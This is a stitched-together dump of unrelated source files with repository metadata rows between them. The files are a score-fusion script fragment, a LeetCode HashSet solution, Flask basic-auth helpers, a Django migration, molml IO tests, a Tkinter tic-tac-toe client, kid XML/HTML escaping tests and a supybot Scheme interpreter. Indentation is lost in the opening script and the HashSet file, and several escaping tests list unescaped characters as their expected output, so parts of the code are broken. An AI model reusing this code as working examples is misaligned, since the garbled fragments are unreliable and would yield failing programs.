                resultsSum[did] += score  # TODO: normalize scores per run before summing
combSumResults[qid] = resultsSum
return combSumResults
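# Worked example (added comment, not original code): for one query whose two
# runs returned [('d1', 1, 0.9), ('d2', 2, 0.4)] and [('d2', 1, 0.7), ('d1', 2, 0.2)],
# combSum yields {'d1': 1.1, 'd2': 1.1}; comparable score ranges across runs
# are assumed, hence the normalization TODO above.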
def writeResults(results, outFile):
out = open(outFile, "w")
for qid, queryResults in results.items():
rank = 1
queryResults = queryResults.items()
queryResults.sort(key = lambda docScore : docScore[1], reverse = True)
for did, score in queryResults:
out.write("%d Q0 %s %d %f STANDARD\n" % (qid, did, rank, score))
rank += 1
out.close()
def run():
resultsFiles = getResultsFiles()
resultsList = readMultipleResults(resultsFiles)
combinedResults = combSum(resultsList)
rerankedResultsFile = "../ir/results/results-" + YEAR + ".txt.reranked." + CLASS_ID + ".combined"
writeResults(combinedResults, rerankedResultsFile)
run()
|
gpl-3.0
| 4,474,460,145,658,808,300 | 26.970149 | 103 | 0.733725 | false |
openqt/algorithms
|
leetcode/python/lc705-design-hashset.py
|
1
|
1918
|
# coding=utf-8
import unittest
"""705. Design HashSet
https://leetcode.com/problems/design-hashset/description/
Design a HashSet without using any built-in hash table libraries.
To be specific, your design should include these functions:
* `add(value)`: Insert a value into the HashSet.
* `contains(value)` : Return whether the value exists in the HashSet or not.
* `remove(value)`: Remove a value in the HashSet. If the value does not exist in the HashSet, do nothing.
**Example:**
MyHashSet hashSet = new MyHashSet();
hashSet.add(1);
hashSet.add(2);
hashSet.contains(1); // returns true
hashSet.contains(3); // returns false (not found)
hashSet.add(2);
hashSet.contains(2); // returns true
hashSet.remove(2);
hashSet.contains(2); // returns false (already removed)
**Note:**
* All values will be in the range of `[0, 1000000]`.
* The number of operations will be in the range of `[1, 10000]`.
* Please do not use the built-in HashSet library.
Similar Questions:
Design HashMap (design-hashmap)
"""
class MyHashSet(object):
    def __init__(self):
        """
        Initialize your data structure here.
        """
        # Direct-addressing table: the problem bounds keys to [0, 1000000],
        # so a flat boolean list avoids any built-in hash table.
        self._table = [False] * 1000001

    def add(self, key):
        """
        :type key: int
        :rtype: void
        """
        self._table[key] = True

    def remove(self, key):
        """
        :type key: int
        :rtype: void
        """
        self._table[key] = False

    def contains(self, key):
        """
        Returns true if this set contains the specified element
        :type key: int
        :rtype: bool
        """
        return self._table[key]
# Your MyHashSet object will be instantiated and called as such:
# obj = MyHashSet()
# obj.add(key)
# obj.remove(key)
# param_3 = obj.contains(key)
class TestMyHashSet(unittest.TestCase):
    def test(self):
        # sequence from the problem statement above
        hash_set = MyHashSet()
        hash_set.add(1)
        hash_set.add(2)
        self.assertTrue(hash_set.contains(1))
        self.assertFalse(hash_set.contains(3))
        hash_set.add(2)
        self.assertTrue(hash_set.contains(2))
        hash_set.remove(2)
        self.assertFalse(hash_set.contains(2))
if __name__ == "__main__":
unittest.main()
|
gpl-3.0
| 4,615,475,879,569,879,000 | 20.77907 | 107 | 0.569864 | false |
Bakterija/sshare
|
src/server_funcs.py
|
1
|
1604
|
from urllib.parse import urlparse, urljoin
from flask import Flask, Markup, Response, render_template, request
from flask import redirect, url_for, send_from_directory, flash
from logs import Logger, GeventLoggerInfo, GeventLoggerError
from functools import wraps
import app_globals as gvars
import utils
def check_auth(username, password):
"""This function is called to check if a username /
password combination is valid.
"""
user = gvars.manager.get_user(username)
if user:
return user.id == username and password == user.passwd
def authenticate():
"""Sends a 401 response that enables basic auth"""
return Response(
'Could not verify your access level for that URL.\n'
'You have to login with proper credentials', 401,
{'WWW-Authenticate': 'Basic realm="Login Required"'})
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
auth = request.authorization
if not auth or not check_auth(auth.username, auth.password):
return authenticate()
return f(*args, **kwargs)
return decorated
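# Usage sketch (added comment; assumes the Flask `app` defined by the
# application that imports these helpers):
#
#     @app.route('/files')
#     @requires_auth
#     def list_files():
#         ...
#
# `requires_auth` must be the inner decorator so the check wraps the view.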
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in gvars.manager.upload_extensions
def create_file_share_link():
new_link = gvars.manager.url('/file/%s' % (utils.get_random_string(24)))
return new_link
def is_safe_url(target):
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and \
ref_url.netloc == test_url.netloc
|
mit
| 327,322,569,458,350,140 | 33.869565 | 80 | 0.680798 | false |
axeliodiaz/django-curriculum
|
curriculum/migrations/0001_initial.py
|
1
|
10753
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-19 15:42
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Accomplishment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('description', models.TextField()),
('order', models.IntegerField(default=0)),
],
options={
'db_table': 'accomplishments',
'ordering': ['order'],
},
),
migrations.CreateModel(
name='EducationInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('start', models.DateTimeField(blank=True, null=True, verbose_name='start')),
('end', models.DateTimeField(blank=True, null=True, verbose_name='end')),
('name', models.CharField(max_length=250)),
('location', models.CharField(max_length=250)),
('school_url', models.URLField(verbose_name='School URL')),
('summary', models.TextField()),
('is_current', models.BooleanField(default=False)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Education',
},
),
migrations.CreateModel(
name='JobInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('start', models.DateTimeField(blank=True, null=True, verbose_name='start')),
('end', models.DateTimeField(blank=True, null=True, verbose_name='end')),
('company', models.CharField(max_length=250)),
('location', models.CharField(max_length=250)),
('title', models.CharField(max_length=250)),
('company_url', models.URLField(verbose_name='Company URL')),
('description', models.TextField(blank=True)),
('is_current', models.BooleanField(default=False)),
('is_public', models.BooleanField(default=True)),
('company_image', models.CharField(blank=True, help_text='Path to company image, local or otherwise', max_length=250)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'jobs',
'ordering': ['-end', '-start'],
},
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=250)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='LanguageInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('level', models.CharField(max_length=250)),
('language', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='curriculum.Language')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Overview',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('text', models.TextField()),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'Overview',
},
),
migrations.CreateModel(
name='PersonalPhone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=255)),
('phone', models.IntegerField(blank=True)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='PersonalSocialMedia',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('linkedin', models.CharField(blank=True, max_length=255, null=True)),
('twitter', models.CharField(blank=True, max_length=255, null=True)),
('github', models.CharField(blank=True, max_length=255, null=True)),
('bitbucket', models.CharField(blank=True, max_length=255, null=True)),
('gitlab', models.CharField(blank=True, max_length=255, null=True)),
('gplus', models.CharField(blank=True, max_length=255, null=True)),
('instagram', models.CharField(blank=True, max_length=255, null=True)),
('snapchat', models.CharField(blank=True, max_length=255, null=True)),
('skype', models.CharField(blank=True, max_length=255, null=True)),
('wordpress', models.URLField(blank=True, verbose_name='wordpress')),
('youtube', models.URLField(blank=True, verbose_name='youtube')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Skill',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=250)),
('skill_url', models.URLField(blank=True, verbose_name='Skill URL')),
],
options={
'ordering': ['id'],
},
),
migrations.CreateModel(
name='Skillset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('name', models.CharField(max_length=250)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='skill',
name='skillset',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='curriculum.Skillset'),
),
migrations.AddField(
model_name='skill',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='accomplishment',
name='job',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='curriculum.JobInfo'),
),
]
|
mit
| -8,305,945,602,906,848,000 | 54.715026 | 147 | 0.588022 | false |
crcollins/molml
|
tests/test_io.py
|
1
|
2267
|
import unittest
import os
import numpy
from molml.io import read_file_data
from molml.io import read_out_data, read_xyz_data, read_mol2_data
from molml.io import read_cry_data
DATA_PATH = os.path.join(os.path.dirname(__file__), "data")
ELEMENTS = ['C', 'H', 'H', 'H', 'H']
NUMBERS = [6, 1, 1, 1, 1]
COORDS = [
[0.99826008, -0.00246000, -0.00436000],
[2.09021016, -0.00243000, 0.00414000],
[0.63379005, 1.02686007, 0.00414000],
[0.62704006, -0.52773003, 0.87811010],
[0.64136006, -0.50747003, -0.90540005],
]
UNIT = [
[2.0, 0.5, 0.05],
[0.0, 2.0, 0.05],
[0.0, 0.1, 2.0],
]
class IOTest(unittest.TestCase):
def test_read_file_data(self):
base_path = os.path.join(DATA_PATH, "methane")
data = (
('.out', read_out_data),
('.xyz', read_xyz_data),
('.mol2', read_mol2_data),
('.cry', read_cry_data),
)
for ending, func in data:
path = base_path + ending
v1 = func(path)
v2 = read_file_data(path)
self.assertEqual(v1.elements.tolist(), v2.elements.tolist())
self.assertEqual(v1.numbers.tolist(), v2.numbers.tolist())
self.assertTrue(numpy.allclose(v1.coords, v2.coords))
self.assertEqual(v1.elements.tolist(), ELEMENTS)
try:
numpy.testing.assert_array_almost_equal(
v1.coords,
COORDS,
decimal=3)
except AssertionError as e:
self.fail(e)
self.assertEqual(v1.numbers.tolist(), NUMBERS)
def test_empty_file(self):
path = os.path.join(DATA_PATH, "empty")
read_mol2_data(path)
def test_read_cry_data_unit(self):
path = os.path.join(DATA_PATH, "methane.cry")
v = read_cry_data(path)
try:
numpy.testing.assert_array_almost_equal(
v.unit_cell,
UNIT,
decimal=3)
except AssertionError as e:
self.fail(e)
def test_read_file_data_error(self):
path = "garbage.nope"
with self.assertRaises(ValueError):
read_file_data(path)
if __name__ == '__main__':
unittest.main()
|
mit
| 5,609,494,878,036,751,000 | 28.064103 | 72 | 0.538156 | false |
gandrewstone/yadog
|
kid/test/test_serialization_escaping.py
|
1
|
3828
|
# -*- coding: utf-8 -*-
"""Tests exercising text escaping."""
__revision__ = "$Rev: 492 $"
__date__ = "$Date: 2007-07-06 21:38:45 -0400 (Fri, 06 Jul 2007) $"
__author__ = "David Stanek <dstanek@dstanek.com>"
__copyright__ = "Copyright 2006, David Stanek"
__license__ = "MIT <http://www.opensource.org/licenses/mit-license.php>"
from kid.serialization import XMLSerializer, XHTMLSerializer, HTMLSerializer
XML = XMLSerializer
XHTML = XHTMLSerializer
HTML = HTMLSerializer
TEST_CHARS = ('<', '>', '"', "'", '&',)
TEST_STRINGS = ('str', 'k\204se')
TEST_COMBO = ('str<"&">str', "k\204se<'&'>k\204se")
def escape_functions():
"""Generator producing escape functions."""
for serializer in (HTMLSerializer, XMLSerializer, XHTMLSerializer):
for escape in (serializer.escape_cdata, serializer.escape_attrib):
yield serializer, escape
def do_escape(func, test_chars, result_chars, encoding=None):
for x, char in enumerate(test_chars):
assert func(char, encoding) == result_chars[x]
def test_escape():
expected = {
XML.escape_cdata: ('<', '>', '"', "'", '&',),
XML.escape_attrib: ('<', '>', '"', "'", '&',),
XHTML.escape_cdata: ('<', '>', '"', "'", '&',),
XHTML.escape_attrib: ('<', '>', '"', "'", '&',),
HTML.escape_cdata: ('<', '>', '"', "'", '&',),
HTML.escape_attrib: ('<', '>', '"', "'", '&',),
}
for serializer, escape in escape_functions():
do_escape(escape, TEST_CHARS, expected[escape])
def test_escape_encoding():
"""Test the encoding part of the escaping functions."""
ascii_expected = ('str', 'k\204se')
    utf8_expected = ('str', 'k\204se')
for serializer, escape in escape_functions():
do_escape(escape, TEST_STRINGS, ascii_expected)
do_escape(escape, TEST_STRINGS, utf8_expected, 'utf-8')
def test_escape_encoding_combo():
ascii_expected = {
XML.escape_cdata:
('str<"&">str', "k\204se<'&'>k\204se"),
XML.escape_attrib:
('str<"&">str', "k\204se<'&'>k\204se"),
XHTML.escape_cdata:
('str<"&">str', "k\204se<'&'>k\204se"),
XHTML.escape_attrib:
('str<"&">str', "k\204se<'&'>k\204se"),
HTML.escape_cdata:
('str<"&">str', "k\204se<'&'>k\204se"),
HTML.escape_attrib:
('str<"&">str', "k\204se<'&'>k\204se"),
}
    utf8_expected = {
        XML.escape_cdata:
            ('str<"&">str', "k\204se<'&'>k\204se"),
        XML.escape_attrib:
            ('str<"&">str',
             "k\204se<'&'>k\204se"),
        XHTML.escape_cdata:
            ('str<"&">str', "k\204se<'&'>k\204se"),
        XHTML.escape_attrib:
            ('str<"&">str',
             "k\204se<'&'>k\204se"),
        HTML.escape_cdata:
            ('str<"&">str', "k\204se<'&'>k\204se"),
        HTML.escape_attrib:
            ('str<"&">str',
             "k\204se<'&'>k\204se"),
    }
for serializer, escape in escape_functions():
do_escape(escape, TEST_COMBO, ascii_expected[escape])
do_escape(escape, TEST_COMBO, utf8_expected[escape], 'utf-8')
def test_escaping_int():
for serializer, escape in escape_functions():
try:
assert escape(1)
except TypeError, e:
assert str(e) == 'cannot serialize 1 (type int)'
def test_escaping_nbsp():
for serializer, escape in escape_functions():
assert escape('\xa0', 'ascii') == ' '
assert escape('\xa0', 'ascii', {'\xa0': 'bingo'}) == 'bingo'
|
gpl-3.0
| 4,572,696,431,716,807,000 | 38.463918 | 76 | 0.549896 | false |
mjzffr/nettt
|
nettt/nettt_gui.py
|
1
|
6334
|
#!/usr/bin/env python2
import Tkinter as tk
# themed tk
import ttk
import tkFont
import nettt_client as c
WIDTH = 750
HEIGHT = 800
PLAYER_LABELS = {c.BSTATES['P1']:'X',
c.BSTATES['P2']:'O',
c.BSTATES['EMPTY']:''}
CONNMSGS = {'connect':'Connecting...',
'waiting': 'Connected. Awaiting partner.',
'insession': 'Connected. You are',
'failed': 'Connection failed.'}
TURNMSGS = {'partner': "Partner's turn.",
'you': 'Your turn.'}
class TkTictactoe(ttk.Frame):
def __init__(self, master = None):
ttk.Frame.__init__(self, master, width=WIDTH, height=HEIGHT)
# don't shrink the frame to its content
self.grid_propagate(False)
# draw the frame (and its content); make all the edges of the frame
# stick to the edges of the root window
self.grid(sticky=tk.NSEW)
# All the board buttons should expand if the main window is resized
# We achieve this by giving w/h of the cells on the diagonal the same
# "expansion" weight
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.columnconfigure(1, weight=1)
self.rowconfigure(1, weight=1)
self.columnconfigure(2, weight=1)
self.rowconfigure(2, weight=1)
self.place_widgets()
self.client = c.TTTClient()
self.connect()
def place_widgets(self):
# game buttons
self.board = [[tk.Button(self, font=tkFont.Font(size=60), fg='black')
for i in range(3)] for i in range(3)]
for rownum, row in enumerate(self.board):
for colnum, button in enumerate(row):
name = str(rownum) + ',' + str(colnum)
button.grid(column=colnum, row=rownum, sticky=tk.NSEW)
button.bind("<Button-1>", self.record_move)
# menu
self.conn_btn = tk.Button(self, text='Connect', command=self.connect)
self.conn_btn.grid(column=0, row=4, pady=10)
self.quit_btn = ttk.Button(self, text='Exit', command=self.quit)
self.quit_btn.grid(column=2, row=4, pady=10)
self.newgame_btn = ttk.Button(self, text='New Game',
command=self.start_new_game)
self.newgame_btn.grid(column=2, row=3, pady=10)
# status
self.glostlbl = tk.Label(self, text="Games Lost: 0")
self.glostlbl.grid(column=1, row=3)
self.gwonlbl = tk.Label(self, text="Games Won: 0")
self.gwonlbl.grid(column=0, row=3)
self.connlbl = tk.Label(self, text=CONNMSGS['connect'])
self.connlbl.grid(column=1, row=4)
self.turnlbl = tk.Label(self, text='')
self.turnlbl.grid(column=1, row=5)
for i in [self.connlbl, self.turnlbl]:
i['wraplength'] = WIDTH/7
i['padx'] = 0
def connect(self):
# connect button
self.connlbl['text'] = CONNMSGS['connect']
self.client.connect()
if self.client.connected:
self.conn_btn['fg'] = 'black'
self.connlbl['text'] = CONNMSGS['waiting']
else:
self.conn_btn['fg'] = 'red'
self.connlbl['text'] = CONNMSGS['failed']
#TODO
# self.THISPLAYER = ??? #TODO: THISPLAYER should actually belong to client
def quit(self):
self.client.end_session()
self.master.quit()
def record_move(self, event):
''' process human move '''
# if not self.game.is_over():
# if event.widget['text'] == '':
# P = self.THISPLAYER
# player_repr = PLAYER_LABELS[P]
# self.game.make_move(P, self.find_button_coords(event.widget))
# event.widget['text'] = player_repr
# # check for game over each time make_move is called
# if self.game.is_over():
# self.cleanup()
# self.record_computer_move()
# def record_computer_move(self):
# ''' process move generated by super fancy game ai'''
# if not self.game.is_over():
# PLAYER = self.THISPLAYER * -1
# player_repr = PLAYER_LABELS[PLAYER]
# (row, col) = self.game.make_random_move(PLAYER)
# self.board[row][col]['text'] = player_repr
# # check for game over each time make_move is called
# if self.game.is_over():
# self.cleanup()
def cleanup(self):
''' update/reset after finished game '''
pass
# mode = self.game.mode
# if mode == ttt.GSTATES['P1WON']:
# self.update_status_lbl(self.gwonlbl,
# self.game.wins[self.THISPLAYER])
# elif mode == ttt.GSTATES['P2WON']:
# self.update_status_lbl(self.glostlbl,
# self.game.losses[self.THISPLAYER])
# if mode < 2: # X won or O won
# for (row,col) in self.game.lastwincoords:
# self.board[row][col].configure(fg="red")
def start_new_game(self):
pass
# PLAYER = self.THISPLAYER
# self.game.reset(PLAYER)
# self.update_status_lbl(self.glostlbl, self.game.losses[PLAYER])
# # reset the buttons
# for row in self.board:
# for b in row:
# b['text'] = ''
# b['fg'] = 'black'
def update_status_lbl(self, label, newcount):
ltext = label['text']
label['text'] = (ltext[:ltext.rindex(':') + 1] + " " +
str(newcount))
def find_button_coords(self, button):
# This sucks. I don't know how to associate a button with an id in tk
# but it seems impossible
for r,row in enumerate(self.board):
for c,b in enumerate(row):
if b is button:
return (r,c)
raise Exception("Button not found!")
# puts the Tktictactoe frame in main root window
if __name__ == "__main__":
root = tk.Tk()
# the window content should expand if the main window is resized
root.grid_columnconfigure(0, weight=1)
root.grid_rowconfigure(0, weight=1)
gameframe = TkTictactoe(master = root)
root.title("Tic Tac Toe!")
root.mainloop()
|
unlicense
| 3,240,913,328,061,072,000 | 33.237838 | 86 | 0.548942 | false |
kg-bot/SupyBot
|
plugins/Scheme/plugin.py
|
1
|
8304
|
###
# Copyright (c) 2013, Valentin Lorentz
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import ast
import copy
import operator
import fractions
import functools
import collections
import supybot.utils as utils
from supybot.commands import *
import supybot.plugins as plugins
import supybot.ircutils as ircutils
import supybot.callbacks as callbacks
from supybot.i18n import PluginInternationalization, internationalizeDocstring
_ = PluginInternationalization('Scheme')
NUMBER_TYPES = (
('integer', int),
('rational', fractions.Fraction),
('real', float),
('complex', complex),
('number', str),
)
class SchemeException(Exception):
pass
def no_edge_effect(f):
def newf(tree, env):
return f(tree, env.copy())
return newf
def eval_argument(arg, env):
if isinstance(arg, list):
return eval_scheme(arg, env)
elif isinstance(arg, str):
if arg in env:
return eval_argument(env[arg], {})
else:
for name, parser in NUMBER_TYPES:
try:
return parser(arg)
except ValueError:
pass
# You shall not pass
raise SchemeException(_('Unbound variable: %s') % arg)
else:
return arg
def py2scheme(tree):
if isinstance(tree, list):
return '(%s)' % (' '.join(map(py2scheme, tree)))
else:
return str(tree)
def schemify_math(f):
# Makes a two-arguments function an *args function, with correct
# type parsing.
def rec(args):
if args[2:]:
return f(args[0], rec(args[1:]))
else:
return f(args[0], args[1])
def newf(tree, env):
return rec(map(functools.partial(eval_argument, env=env), tree[1:]))
newf.__name__ = 'schemified_%s' % f.__name__
return newf
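# A right fold over the arguments: e.g. with the '+' registered below,
# (+ 1 2 3) evaluates as add(1, add(2, 3)) == 6 (follows from rec() above).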
ARGUMENTS_ERROR = _('%s takes %s %i arguments not %i (in (%s))')
@no_edge_effect
def scm_lambda(tree, env):
try:
self, args, expr = tree
except ValueError:
raise SchemeException(ARGUMENTS_ERROR %
('lambda', _('exactly'), 2, len(tree)-1, py2scheme(tree)))
if not isinstance(args, list):
args = ['.', args]
try:
if args.index('.') != len(args)-2:
raise SchemeException(_('Invalid arguments list: %s') %
py2scheme(args))
rest = args[-1]
args = args[0:-2]
except ValueError: # No rest
rest = None
@no_edge_effect
def f(tree2, env2):
self2, args2 = tree2[0], tree2[1:]
arguments_error = ARGUMENTS_ERROR % \
(self2, '%s', len(args), len(args2), tree2)
env3 = env2.copy()
if len(args2) < len(args):
raise SchemeException(arguments_error %
_('at least') if rest else _('exactly'))
elif not rest and len(args2) > len(args):
raise SchemeException(arguments_error % _('exactly'))
else:
env3.update(dict(zip(args, args2)))
if rest:
env3.update({rest: args2[len(args):]})
return eval_scheme(expr, env3)
f.__name__ = 'scheme_%s' % py2scheme(tree)
return f
def scm_begin(tree, env):
    # Evaluate the leading expressions for their side effects in the
    # current environment, then return the value of the final expression.
    for arg in tree[1:-1]:
        eval_scheme(arg, env)
    return eval_scheme(tree[-1], env)
def scm_set(tree, env):
try:
self, name, value = tree
except ValueError:
raise SchemeException(ARGUMENTS_ERROR %
('set!', _('exactly'), 2, len(tree)-1, py2scheme(tree)))
env[name] = value
DEFAULT_ENV = [
('lambda', scm_lambda),
('begin', scm_begin),
('set!', scm_set),
]
# Add some math operators
DEFAULT_ENV += map(lambda x:(x[0], schemify_math(x[1])), (
('+', operator.add),
('-', operator.sub),
('*', operator.mul),
('/', operator.truediv),
))
DEFAULT_ENV = dict(DEFAULT_ENV)
def parse_scheme(code, start=0, end=None, unpack=False):
if end is None:
end = len(code)-1
while code[start] == ' ':
start += 1
while code[end] == ' ':
end -= 1
if code[start] == '(' and code[end] == ')':
return parse_scheme(code, start+1, end-1, unpack=False)
level = 0
in_string = False
escaped = False
tokens = []
token_start = start
for i in xrange(start, end+1):
if code[i] == '"' and not escaped:
in_string = not in_string
elif in_string:
pass
elif code[i] == '\'':
escaped = not escaped
elif code[i] == '(':
level += 1
elif code[i] == ')':
level -=1
if level == -1:
raise SchemeException(_('At index %i, unexpected `)\' near %s')
% (end, code[max(0, end-10):end+10]))
elif level == 0:
tokens.append(parse_scheme(code, token_start, i))
token_start = i+1
elif level == 0 and code[i] == ' ' and token_start != i:
tokens.append(parse_scheme(code, token_start, i))
token_start = i+1
else:
continue # Nothing to do
if level != 0:
raise SchemeException(_('Unclosed parenthesis in: %s') %
code[start:end+1])
if start == token_start:
return code[start:end+1]
elif start < end:
tokens.append(parse_scheme(code, token_start, end))
tokens = filter(bool, tokens)
if unpack:
assert len(tokens) == 1, tokens
tokens = tokens[0]
return tokens
def eval_scheme(tree, env=DEFAULT_ENV):
if isinstance(tree, str):
if tree in env:
return env[tree]
else:
print(repr(env))
raise SchemeException(_('Undefined keyword %s.') % tree)
    first = eval_scheme(tree[0], env)  # resolve the operator in the current env
if callable(first):
return first(tree, env)
else:
return tree
def eval_scheme_result(tree):
if isinstance(tree, list):
return '(%s)' % ' '.join(map(eval_scheme_result, tree))
else:
return str(eval_argument(tree, []))
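# Quick illustrative check of the pipeline above (value follows from
# DEFAULT_ENV; not part of the plugin itself):
#   eval_scheme_result(eval_scheme(parse_scheme('(+ 1 2 3)')))  ->  '6'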
@internationalizeDocstring
class Scheme(callbacks.Plugin):
"""Add the help for "@plugin help Scheme" here
This should describe *how* to use this plugin."""
threaded = True
@internationalizeDocstring
def scheme(self, irc, msg, args, code):
"""<code>
Evaluates Scheme."""
try:
tree = parse_scheme(code)
except SchemeException as e:
irc.error('Syntax error: ' + e.args[0], Raise=True)
try:
result = eval_scheme(tree)
except SchemeException as e:
irc.error('Runtime error: ' + e.args[0], Raise=True)
irc.reply(eval_scheme_result(result))
scheme = wrap(scheme, ['text'])
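    # Hypothetical in-channel exchange (exact trigger depends on bot config):
    #   <user> @scheme (* (+ 1 2) 4)
    #   <bot>  12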
Class = Scheme
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
|
gpl-3.0
| 7,687,150,768,596,833,000 | 31.186047 | 79 | 0.596339 | false |
Multiscale-Genomics/mg-process-fastq
|
tool/aligner_utils.py
|
1
|
16998
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import shlex
import subprocess
import os
import os.path
import shutil
import tarfile
from utils import logger
from tool.common import cd
from tool.bam_utils import bamUtils
class alignerUtils(object): # pylint: disable=invalid-name
"""
Functions for downloading and processing N-seq FastQ files. Functions
provided allow for the downloading and indexing of the genome assemblies.
"""
def __init__(self):
"""
Initialise the module
"""
logger.info("Alignment Utils")
@staticmethod
